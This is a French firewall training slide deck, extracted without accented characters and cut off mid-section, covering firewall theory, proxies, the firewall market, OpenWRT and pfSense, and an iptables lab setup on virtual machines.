Vous êtes sur la page 1sur 270

goffinet@goffinet.

eu, Pare-feu thorie et pratique, CC-BY


Les pare-feu thorie et
pratique
Introduction, Linux Netfilter, BSD pfSense,
Cisco IOS
version 2014.04
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Sommaire gnral
I. Thorie
1. Avant-propos
2. Dfinition
3. Fonctionnement
4. Classification
5. March
6. Pare-feu Open Source
II. Pratique Netfilter
7. Topologie Netfilter
8. Netfilter/iptables
9. Examen avanc du pare-feu
Netfilter
10. Audit du pare-feu
III. Pratique pfSense
11. Topologie pfSense
12. Observation et configuration du
pare-feu
13. Configuration Proxy Transparent
14. NAT : DMZ ou Reverse Proxy
IV. Pratique Cisco IOS
15. Topologie Cisco
16. ACLs Cisco IOS
17. Cisco ZBF
18. Pare-feu Cisco IPv6
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
I. Introduction aux pare-
feu
Pare-feu thorie et pratique
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Sommaire Introduction aux pare-feu
1. Avant-propos
2. Dfinition
3. Fonctionnement
4. Classification
5. March
6. Pare-feu Open Source
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
1. Introduction
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
1. Introduction
Objectifs de la formation
Acquis/pr-requis
Architecture de scurit
Modle de conception
Attaques TCP/IP
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Objectifs de la formation
Ce document est un support de formation thorique et pratique
dinitiation aux pare-feu TCP/IP. Il est destin un public de
professionnels IT ayant dj une bonne connaissance de
TCP/IP.
Le propos prend pour illustration des produits Open Source
virtualiss Linux Netfilter, BSD pf (pfSense) et Cisco IOS. Les
labs proposs peuvent tre raliss chez soi sur son propre PC.
Le support correspond et introduit au programme CCNA Security
(Firewalls).
Ce document vise pdagogique nest en rien un livre de
recette ou un guide. Une prsence et une participation active au
cours est ncessaire pour bien suivre la prsentation.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Acquis/pr-requis
Rappels TCP/IP
Concepts de scurit, attaques, menaces, contre-
mesures
La matrise doutils daudit tels que Wireshark, Nmap et
Netcat.
Une topologie route fonctionnelle en TCP/IP
GNS3/VirtualBox/VMWare.
Des services dploys : Telnet, SSH, NTP, SNMP,
DNS, Syslog, ICMP, IPv6, OSPF, Radius.
802.1X/Radius/802.11i
Tunnel traversant les pare-feu/proxy public
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Architecture de scurit
Architectures et mthodes de scurit : par exemple
modules Cisco SAFE.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Modle de conception
Mise en oeuvre des politiques de scurit :
exemple : Cisco.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Attaques TCP/IP
IP Spoofing, TCP/IP scanning, Flooding, DoS, DDoS,
variante TCP/UDP (voir NMAP). Variantes IPv6 (voir
THC-IPv6).
Attaques sur les protocoles de routage intrieurs et
BGP
Attaques dhomme du milieu (MitM), de
reconnaissance, dvasion, attaque en force-brute, trafic
malicieux, phishing, dnis de service (DoS, DDoS), par
rflexion, backdoor, injections Web, via malware ou
worms
http://hakipedia.com/index.php/Hakipedia
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
2. Dfinition
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
2. Dfinition
Pare-feu / Firewall
Objectifs dun pare-feu
Ce que le pare-feu ne fait pas
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Pare-feu / Firewall
Dans un systme d'information, les politiques de filtrage
et de contrle du trafic sont places sur un matriel ou
un logiciel intermdiaire communment appel pare-
feu (firewall).
Cet lment du rseau a pour fonction dexaminer et
filtrer le trafic qui le traverse.
On peut le considrer comme une fonctionnalit dun
rseau scuris : la fonctionnalit pare-feu
Lide qui prvaut ce type de fonctionnalit est le
contrle des flux du rseau TCP/IP.
Le pare-feu limite le taux de paquets et de connexions
actives. Il reconnat les flux applicatifs.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Objectifs dun pare-feu
Il a pour objectifs de rpondre aux menaces et attaques
suivantes, de manire non-exhaustive :
Usurpation didentit
La manipulation dinformations
Les attaques de dni de service (DoS/DDoS)
Les attaques par code malicieux
La fuite dinformation
Les accs non-autoris (en vue dlvation de privilge)
Les attaques de reconnaissance, dhomme du milieu, l
exploitation de TCP/IP
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Ce que le pare-feu ne fait pas
Le pare-feu est central dans une architecture
scurise mais :
Il ne protge pas des menaces internes.
Il napplique pas tout seul les politiques de
scurit et leur surveillance.
Il ntablit pas la connectivit par dfaut.
Le filtrage peut intervenir tous les niveaux
TCP/IP de manire trs fine.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
3. Fonctionnement
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
3. Fonctionnement
Fonctionnement
Zone de confiance sur un pare-feu
Niveau de confiance
Attaques sur le LAN
Filtrage
Politique de filtrage typique
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Fonctionnement
Il a pour principale tche de contrler le trafic entre
diffrentes zones de confiance, en filtrant les flux de
donnes qui y transitent.
Gnralement, les zones de confiance incluent lInternet (une zone dont la
confiance est nulle) et au moins un rseau interne (une zone dont la confiance
est plus importante).
Le but est de fournir une connectivit contrle et matrise entre des zones de
diffrents niveaux de confiance, grce l'application de la politique de scurit
et d'un modle de connexion bas sur le principe du moindre privilge.
Un pare-feu fait souvent office de routeur et permet ainsi
d'isoler le rseau en plusieurs zones de scurit appeles
zones dmilitarises ou DMZ. Ces zones sont spares
suivant le niveau de confiance qu'on leur porte.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Zone de confiance sur un pare-feu
Organisation du rseau en zones
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Niveau de confiance
Le niveau de confiance est la certitude que les utilisateurs
vont respecter les politiques de scurit de lorganisation.
Ces politiques de scurit sont dictes dans un document
crit de manire gnrale. Ces recommandations touchent
tous les lments de scurit de lorganisation et sont
traduites particulirement sur les pare-feu en diffrentes
rgles de filtrage.
On notera que le pare-feu nexamine que le trafic qui le
traverse et ne protge en rien des attaques internes,
notamment sur le LAN.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Attaques sur le LAN
On doit considrer le LAN comme ntant pas exempt de
menaces (dites internes).
Il englobe aussi bien les rseaux filaires (IEEE 802.3) que
sans-fil (IEEE 802.11) dans des architectures
traditionnelles ou ouvertes (BYOD).
Le pare-feu nintervient que partiellement dans la mise en
oeuvre de politiques de scurit au niveau de la couche 2 :
Cisco appelle cet aspect First Hop Security.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Politiques de filtrage
Selon les besoins, on placera les politiques de filtrage
diffrents endroits du rseau, au minimum sur chaque hte
contrl (pare-feu local) et en bordure du rseau
administr sur le pare-feu. Ces emplacements peuvent tre
distribu dans la topologie selon sa complexit.
Pour viter qu'il ne devienne un point unique de rupture, on
s'efforcera d'assurer la redondance des pare-feu. On
placera plusieurs pare-feu dans larchitecture du rseau
des fins de contrle au plus proche dune zone ou pour
rpartir la charge.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Filtrage
La configuration d'un pare-feu consiste la plupart du temps
en un ensemble de rgles qui dterminent une action de
rejet ou d'autorisation du trafic qui passe les interfaces du
pare-feu en fonction de certains critres tels que :
l'origine et la destination du trafic,
des informations d'un protocole de couche 3 (IPv4,
IPv6, ARP, etc.),
des informations d'un protocole de couche 4 (ICMP,
TCP, UDP, ESP, AH, etc.)
et/ou des informations d'un protocole applicatif (HTTP,
SMTP, DNS, etc.).
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Dcision de filtrage
Les rgles sont appliques
en fonction de la direction du
trafic entrant ou sortant sur
une interface, avant ou
aprs le processus de
routage des paquets. Cette
dernire ralit diffre selon
le logiciel ou le matriel
choisi pour remplir ces
tches.
Ici lexemple de Netfilter.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Rgles
Chaque rgle est examine selon son ordonnancement.
Si le trafic ne correspond pas la premire rgle, la seconde rgle
est value et ainsi de suite.
Lorsqu'il y a correspondance entre les critres de la rgle et le
trafic, l'action dfinie est excute et les rgles suivantes ne sont
pas examines.
La terminologie des actions usuelles peuvent tre accept, permit,
deny, block, reject, drop, ou similaires.
En gnral, un ensemble de rgles se termine par le refus de tout
trafic, soit en dernier recours le refus du trafic qui traverse le pare-
feu. Ce comportement habituellement dfini par dfaut ou de
manire implicite refuse tout trafic pour lequel il n'y avait pas de
correspondance dans les rgles prcdentes.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Politique de filtrage typique
On peut rsumer des
politiques de filtrage typique.
LAN > WAN
WAN X LAN
LAN > DMZ
DMZ X LAN
WAN X DMZ (sauf
TCP80 par exemple)
DMZ > WAN
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Topologie dtude
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
4. Classification
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
4. Classification
Filtrage sans tat
Pare-feu tat
Pare-feu applicatif
Serveur Proxy
Fonctionnalits supplmentaires
Reverse-Proxy
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Classification
On distinguera les fonctionnalits gnrationnelles :
pare-feu sans tat,
pare-feu avec tat, filtrant les sessions TCP
entrantes et sortantes.
et pare-feu applicatif.
Dans une autre typologie fonde sur l'emplacement des
fonctionnalits, on distinguera les
pare-feu locaux des
pare-feu ddis, logiciels ou matriels.
On remarquera utilement que Windows dispose d'un pare-
feu local intgr.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Filtrage sans tat
Le filtrage sans tat correspond lusage des
ACLs Cisco.
Ces rgles de filtrage ne tiennent pas compte
de ltat des session TCP/UDP/ICMP ou de la
conformit applicative.
Leur apprentissage consiste en un bon
dmarrage en la matire.
http://fr.scribd.com/doc/206817949/ICND1-0x0B-ACLs-et-
diagnostic
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Pare-feu tat
En informatique, un pare-feu tats (stateful firewall,
stateful inspection firewall ou stateful packet inspection
firewall en anglais) est un pare-feu qui garde en mmoire
l'tat de connexions rseau (comme les flux TCP, les
communications UDP) qui le traversent.
Le fait de garder en souvenir les tats de connexions prcdents permet de
mieux dtecter et carter les intrusions et assurer une meilleure scurit. Le
pare-feu est programm pour distinguer les paquets lgitimes pour diffrents
types de connexions. Seuls les paquets qui correspondent une connexion
active connue seront autoriss par le pare-feu, d'autres seront rejets.
Linspection dtat (stateful inspection), appele aussi le filtrage dynamique (
Dynamic Packet Filtering) est une fonctionnalit de scurit qui est souvent
implmente dans des rseaux d'entreprises. Cette fonctionnalit a t
invente par Check Point Software, qui la lance avec leur logiciel FireWall-1
en 1994.
http://fr.wikipedia.org/wiki/Pare-feu_%C3%A0_%C3%A9tats
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Pare-feu applicatif
Un pare-feu applicatif vrifie la conformit du paquet par
rapport un protocole applicatif attendu.
Par exemple, ce type de pare-feu permet de vrifier que seul du trafic HTTP
passe par le port TCP 80. Ce traitement est trs gourmand en temps de calcul
ds que le dbit devient trs important. Il est justifi par le fait que de plus en
plus de protocoles rseaux utilisent un tunnel TCP afin de contourner le filtrage
par ports.
Une autre raison de l'inspection applicative est l'ouverture dynamique de ports.
Certains protocoles comme le fameux FTP en mode passif changent entre le
client et le serveur des adresses IP ou des ports TCP/UDP. Ces protocoles
sont dits contenu sale ou passant difficilement les pare-feu car ils
changent au niveau applicatif (FTP) des informations du niveau IP (change
d'adresses) ou du niveau TCP (change de ports). Ce qui transgresse le
principe de la sparation des couches rseaux. Pour cette raison, les
protocoles contenu sale passent difficilement voire pas du tout les rgles
de NAT ...dynamiques, moins qu'une inspection applicative ne soit faite sur
ce protocole.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Solution pare-feu applicatif
Chaque type de pare-feu sait inspecter un nombre limit d'applications.
Chaque application est gre par un module diffrent pour pouvoir les activer
ou les dsactiver.
La terminologie pour le concept de module est diffrente pour chaque type de
pare-feu : par exemple : Le protocole HTTP permet d'accder en lecture sur un
serveur par une commande GET, et en criture par une commande PUT. Un
pare-feu applicatif va tre en mesure d'analyser une connexion HTTP et de
n'autoriser les commandes PUT qu' un nombre restreint de machines.
Conntrack (suivi de connexion) et l7 Filter (filtrage applicatif) sur Linux
Netfilter
Packet Filter ou PF, pare-feu libre de OpenBSD, import depuis sur les
autres BSD.
CBAC sur Cisco IOS, Fixup puis inspect sur Cisco PIX
Predefined Services sur Juniper ScreenOS
Stateful Inspection sur Check Point FireWall-1
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Serveur Proxy
La fonctionnalit serveur Proxy (mandataire) consiste lui
confier du trafic qui le traverse, avec le support dHTTP,
HTTPS, FTP, voire tout protocole TCP/UDP.
Cette fonctionnalit rompt la connectivit TCP/IP mais
permet un contrle fin du trafic des utilisateurs.
A des fins de performance : cache, compression, de filtrage de publicit ou
de contenus lourds
A des fins de journalisation
En supportant AAA pour contrler le trafic des utilisateurs internes
(authentification, autorisation, comptabilisation)
En assurant la confidentialit des communications (chiffrement)
En filtrant sur base des URLs, voire du contenu
En reprenant des fonctionnalits de pare-feu
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Architecture serveur Proxy
Un serveur proxy est un logiciel local ( des fins de mise en
tunnel), excut sur un serveur distant ou sur le pare-feu
lui-mme.
Il peut ncessiter une intervention sur les machines clientes
ou tre totalement transparent.
Un serveur proxy remplace les paramtres TCP/IP de l
metteur et le rend plus transparent sur le rseau. Dune
certaine manire il peut renforcer lanonymat.
Un Forwarding proxy prend en charge les
requtes venant dun rseau interne et les
transfre vers lInternet.
Un proxy ouvert prend en charge les
requtes venant de nimporte quel rseau
et les transfre vers lInternet.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Fonctionnalits supplmentaires
Dans le mme ordre d'ides, compte tenu de son
emplacement critique, il hbergera des fonctions :
de concentrateur VPN,
de rpartiteur de charge du trafic,
de traffic shapping et de contrle de congestion (WAN)
le support des encapsulations VLAN,
des protections contre les virus, logiciels et messages
TCP/IP malveillants,
de la dtection et/ou de la prvention de d'intrusion
(IDS/IPS),
bien que ntant pas dans ses attributions le support
des protocoles de routage,
etc.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Dernires recommandations
En soi, le pare-feu ne protge le rseau que de manire
incomplte. On compltera l'infrastructure scurise par
des solutions de surveillance du rseau.
Une infrastructure de gestion des anti-virus et pare-feu
locaux ainsi que des mises jours des systmes
d'exploitation et des logiciels installes est aussi
conseille.
Enfin, il ny a pas de scurit du rseau sil nexiste pas
de document qui dcrit les politiques de scurit de l
organisation.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Reverse-Proxy
Un Reverse proxy apparat comme tant le
serveur destinataire final. Il prend en charge les
requtes venant de lInternet et les transfre
un rseau interne.
En ce sens un Reverse-Proxy peut cacher les
caractristiques du serveur qui est demand. Il
peut prendre en charge des fonctionnalits de
filtrage de haut-niveau applicatif.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Fonctionnalits Reverse-Proxy
WAF : Fonctionnalits Applications Firewall
contre des attaques Web et les Worms
SSL Acceleration : Prise en charge du
chiffrement SSL la place du fournisseur de
contenu
Load Balancing : Rpartiteur de trafic (Web)
Mise en cache et/ou compression de
contenu statique ou dynamique, Web
Acceleration
Rcriture dURL, migration de sites WEB
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Pour aller plus loin sur les proxys
3 Implementations of
proxies
3.1 Web proxy servers
3.2 SOCKS proxy
3.3 Transparent proxy
3.3.1 Purpose
3.3.2 Issues
3.3.3 Implementation
methods
3.3.4 Detection
3.4 CGI proxy
3.5 Anonymous HTTPS
proxy
3.6 Suffix proxy
3.7 Tor onion proxy
software
3.8 I2P anonymous
proxy
3.9 Proxy vs. NAT
3.10 DNS proxy
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
5. March
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
5. March
Format
Cibles
Appliances
Firewall Enterprise
Firewall UTM
Web Gateway Filtering
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Format
On trouvera des pare-feu en format :
1. Appliance hardware, ddi (commercial en
gnral).
2. En Software, commercial ou Open-Source
installer sur son propre Hardware, en
virtualisation (DC ou lab)
3. En produits spcialiss ou fonctionnels.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Offre et cibles
Logiciels Open source
Offres commerciales
Segments/cibles :
CPE/Soho Firewalls
UTM : SMB Firewalls
Enterprise Firewalls
Offres spcialises
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Appliances
Matriel physique dinterconnexion.
Minimum des interfaces Gigabit Ethernet
Cuivre et +
Filtrage de Haut niveau et services intgrs
Architectures Intel : puissance, portabilit
Architectures ARM : faible consommation,
portabilit
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Virtualisation
Solutions pare-feu pour Data Center (DC) :
Cisco CSR1000V
Cisco Adaptive Security Virtual Appliance (ASAv)
Vyatta.org et Vyatta.com (Brocade)
pfSense
...
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Firewall Entreprise
The enterprise network firewall market represented by this Magic Quadrant is
composed primarily of purpose-built appliances and virtualized models for
securing corporate networks. Products must be able to support single-
enterprise firewall deployments and large global deployments, including
branch offices. These products are accompanied by highly scalable
management and reporting consoles, products, and a sales and support
ecosystem focused on the enterprise.
Although firewall/VPN and IPS are converging, other security products are
not. All-in-one or unified threat management (UTM) products are suitable for
small or midsize businesses (SMBs) but not for the enterprise: Gartner
forecasts that this separation will continue until at least 2016. Branch-office
firewalls are becoming specialized products, diverging from the SMB
products
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Firewall Entreprise
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Unified Threat Management (UTM)
Gartner defines the unified threat management (UTM) market as
multifunction network security products used by small or midsize
businesses (SMBs). Typically, midsize businesses have 100 to
1,000 employees, with revenue ranging from $50 million to $1
billion. UTM products for the SMB market must provide the
following functions at a minimum:
Standard network stateful firewall functions
Remote access and site-to-site virtual private network (VPN)
support
Secure Web gateway (SWG) functionality (anti-malware,
URL and application control)
Network intrusion prevention focused on workstation
protection
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Unified Threat Management (UTM)
All UTM products contain various other security capabilities, such as email
security, Web application firewalls (WAFs) and data loss prevention.
However, the vast majority of SMBs only utilize
the firewall,
intrusion prevention
and SWG functionalities.
They also request a basic level of application control, mostly to restrict the
use of Web applications and cloud services (such as socialmedia, file sharing
and so on).
Features related to the management of mobile devices create a potentially
attractive differentiator for this market.
Browser-based management, basic embedded reporting, and localized
software and documentation, which don't appeal to large enterprises, are
highly valued by SMBs in this market.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Unified Threat Management (UTM)
SMBs should evaluate UTM devices based on the controls
they will actually use, the performance they will get for
those features, and the quality of vendor and channel (and
managed services) support that is available.
Given the continuing economic uncertainty, most SMBs
have strong IT budgetary and staffing constraints. This
causes them to highly value ease of deployment and use,
strong local channel support, and flexible pricing.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Unified Threat Management (UTM)
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Web Gateway Filtering
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
6. Pare-feu Open Source
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
6. Pare-feu Open Source
Objectifs de la formation
Netfilter/iptables
OpenWRT
pfSense
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Pare-feu Open Source
A embarquer.
Support communautaire large gratuit ou
payant ou commercial.
Solutions tous les niveaux.
Solutions intgres.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Pratique Linux et BSD
1. Etudier le pare-feu Linux Netfilter
2. Dployer une solution UTM OSS : pfSense
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Netfilter
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
OpenWRT
OpenWrt est une distribution GNU/Linux minimaliste pour
matriel embarqu (Routeurs, Tablettes, Tlphones ...).
Historiquement dveloppe pour remplacer le firmware des
routeurs bass sur des SoC Broadcom, par exemple les
routeurs WLAN de Asus, Belkin, Dell, Linksys, US-
Robotics, TP-Link, ... OpenWrt fournit une interface Web
LuCI et une console Linux UCI faciles prendre en
main.
TP-WDR3600/WR841ND sous OpenWRT :
Atheros AR9344@560MHz
128Mb RAM / 8 Mb Flash
SOC + Atheros AR9582 a/b/g/n 2T2R
4 Gbit LAN 1 Gbit WAN
12V 1.5A 2x USB 2.0
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Pfsense
pfSense est un routeur / pare-feu open source bas sur
FreeBSD. pfSense peut tre install sur un simple
ordinateur personnel comme sur un serveur. Bas sur PF
(packet filter), comme iptables sur GNU/Linux, il est rput
pour sa fiabilit. Aprs une installation en mode console, il
s'administre ensuite simplement depuis une interface web
et gre nativement les VLAN (802.1q).
Un support commercial est disponible ainsi quune offre d
appliances Hardware ou virtuelles.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Fonctionnalits pfSense
Firewall
State Tabel
Network Address Translation
High Availability
Load Balancing
Virtual Private Network
PPPoE Server
Reporting and Monitoring
Dynamic DNS
Captive Portal
DHCP Server and Relay
https://doc.pfsense.org/index.php/2.
1_New_Features_and_Changes
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Serveurs Proxy OSS
Squid
SquidGuard
DansGuardian
LightSquid
Privoxy
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
II. Pratique Linux Netfilter
Pare-feu thorie et pratique
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Sommaire Pratique Linux Netfilter
7. Topologie Netfilter
8. Netfilter/iptables
9. Examen avanc du pare-feu Netfilter
10. Audit du pare-feu
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
7. Topologie Linux
Netfilter
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
7. Topologie Linux Netfilter
Fonctionnalits
NAT/PAT, SNAT/DNAT
Topologie dtude, topologie physique,
topologie logique
Composants personnels, quipes
Paramtres rseau et des VMs
Installation du pare-feu
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Fonctionnalits de la topologie
En bordure du rseau, le pare-feu tablit la
connectivit IPv4 avec des fonctions de
routage et de NAT.
Il peut intgrer des fonctionnalits
VPN/IPS/Firewall/proxy intgres ou spares.
On peut ajouter la topologies des moniteurs
IDS/IPS, des appliances NAC, une gestion
intgres des accs, des pare-feu et anti-X
locaux.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
NAT/PAT
La fonctionnalit NAT/PAT vise r-crire les en-ttes
de couche 3 et couche 4.
Il rompt la connectivit TCP/IP.
Il est indispensable pour connecter un rseau global
un rseau IPv4 priv.
Il na pour objectif que dassurer des migrations d
adressage IPv4, notamment en rduisant le manque d
adresses IPv4.
Il ne constitue en rien un technique de scurit, de
filtrage ou de contrle. Il rend le rseau IPv4 un peu
plus opaque.
Il est souvent excut ct des processus de filtrage
puisquil sagit de rcriture de paquets.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
SNAT/DNAT
Le SNAT vise rcrire les adresses/ports source.
Le DNAT vise rcrire les adresses/ports destination.
On peut jouer sur les numros de ports source et
destination.
Les ports connus :
TCP80 HTTP,
TCP443 HTTPS,
TCP25 SMTP,
UDP53 DNS,
UDP123 NTP,
TCP22 SSH,
TCP21 FTP
...
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Configuration de la topologie
Le pare-feu est virtualis (VMWare de prfrence)
Le LAN est aussi virtualis. On y trouve une station
avec un OS graphique : 192.168.1XY.0/24
Le WAN se connecte au rseau local de la machine
physique et obtient ses paramtres IP dynamiquement.
La DMZ est aussi virtualise.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Paramtres par dfaut
La solution pare-feu dmarrera avec un
service DHCP sur le LAN, le routage et le
pare-feu activ par dfaut.
Il se configure grce la station de travail
virtuelle du LAN en SSH, en HTTP ou en
HTTPS.
Son adresse par dfaut est 192.168.1.1
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Zone de confiance sur un pare-feu
Organisation du rseau en zones
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Topologie dtude
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Topologie physique
128Mo 1Go
128Mo 1Go
1Go 2Go
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Topologie Linux/Netfilter
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Composants personnels
Station Windows (ou Linux)
sur un LAN virtuel, station
de contrle du pare-feu en
HTTPS et en SSH
Pare-feu OpenWRT et
Pfsense
Des attaquants potentiels,
les stations hardware du
rseau physique.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Paramtres rseau
Apprenant X
Equipe Y
Lordre de cration des interfaces est
important.
Zone Vmware
Br
Mode Linux Intf Adresse
LAN VMNET1 Host-Only eth0 192.168.1XY.*/24
WAN VMNET0 Bridged eth1 DHCP
DMZ VMNET2 Host-Only eth2 192.168.XY.*/24
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Paramtres des VMs
Une VM Windows 7, Kali ou Ubuntu prte
avec Firefox.
Une VM OpenWRT x86 Linux Ubuntu :
HD :vmdk-ext4 (8 Mo)
3 interfaces
128 Mo RAM
Une interface de gestion par dfaut
192.168.1.1/24
Mot de passe Openwrt : root/admin
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Procdure dinstallation du pare-feu
OpenWRT :
Crer une VM Linux Ubuntu avec le disque
VMDK attach (RAM 128 Mo) et trois
interfaces.
Dmarrez la VM cre
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Etablir la connectivit
1. (Activer le mot de passe) et changer le nom
2. (Changer ladressage)
3. (Configuration des interfaces)
4. Activation du routage et du NAT
5. Service DHCP (client et serveur)
6. Service DNS
7. Service NTP
8. Service de Logs
9. Service daccs distant
10. Services IPv6
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Configuration de linterface WAN
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
NTP
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Mot de passe et SSH
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Vrification gnrale
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
8. Netfilter/iptables
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Netfilter/iptables
Firewall OpenWRT - LuCI Firewall
Thorie Netfilter/iptables
Mise en oeuvre dun pare-feu Netfilter
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Pare-feu OpenWRT
OpenWrt s'appuie sur Netfilter pour le filtrage de paquets,
le NAT/PAT et leur altration (mangle). LuCI Firewall fournit
une interface de configuration qui fait abstraction du
systme iptables. Il fournit un modle de configuration
simplifie qui est propre la plupart des besoins rguliers
tout en permettant l'utilisateur de construire des rgles
iptables particulires. OpenWRT dispose de plusieurs
avantages :
facilement portable
gratuit
dmonstratif
faible emprunte
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
LuCI Firewall (1/2)
LuCI Firewall relie deux ou plusieurs interfaces ensembles
dans des zones qui sont utilises pour dcrire les rgles
par dfaut pour une interface donne, la transmission des
rgles entre les interfaces, et des rgles supplmentaires
qui ne sont pas couvertes par les deux premiers.
Toute la configuration, assez lisible, se trouve dans
/etc/config/firewall
Le service se manipule de la sorte :
/etc/init.d/firewall [stop|start]
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
LuCI Firewall (2/2)
Dans le fichier de configuration, les rgles par dfaut
viennent en premier, mais elles sont les dernires
prendre effet. Le systme de Netfilter est un filtre de
traitement enchan o les paquets passent par diverses
rgles.
La premire rgle qui correspond est excute, ce qui conduit souvent une
autre rgle de la chane jusqu' ce qu'un paquet correspond soit ACCEPT ou
DROP ou REJECT. Un tel rsultat est dfinitif, par consquent, les rgles
par dfaut prennent effet dernier, et la rgle la plus spcifique prend effet en
premier.
Les zones sont galement utiliss pour configurer le masquage galement
connu sous le NAT (Network Address Translation) ainsi que les rgles de
redirection de port, qui sont plus gnralement connu sous le nom de
redirections.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Configuration LuCI par zone
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Rgles spcifiques
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
IPTABLES : la thorie
Les rgles de pare-feu sont examines dans l
ordre de leur introduction avec la politique par
dfaut qui termine la liste (la chane).
Chaque rgles est une commande iptables ou
ip6tables.
Ds que la correspondance est trouve, la liste
sarrte.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Trois tables : filter, nat et mangle
iptables et ip6tables sont les logiciels (interface
utilisateur) de filtrage, de traduction dadresses
(NAT/PAT) et de transformation du trafic.
Trois usages, trois tables :
filter
nat
mangle
On ne parlera ici que des tables filter et nat, qui
sont constitues de chanes, sortes dACLs,
elles-mmes constitues de rgles.
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Chanes de la table filter
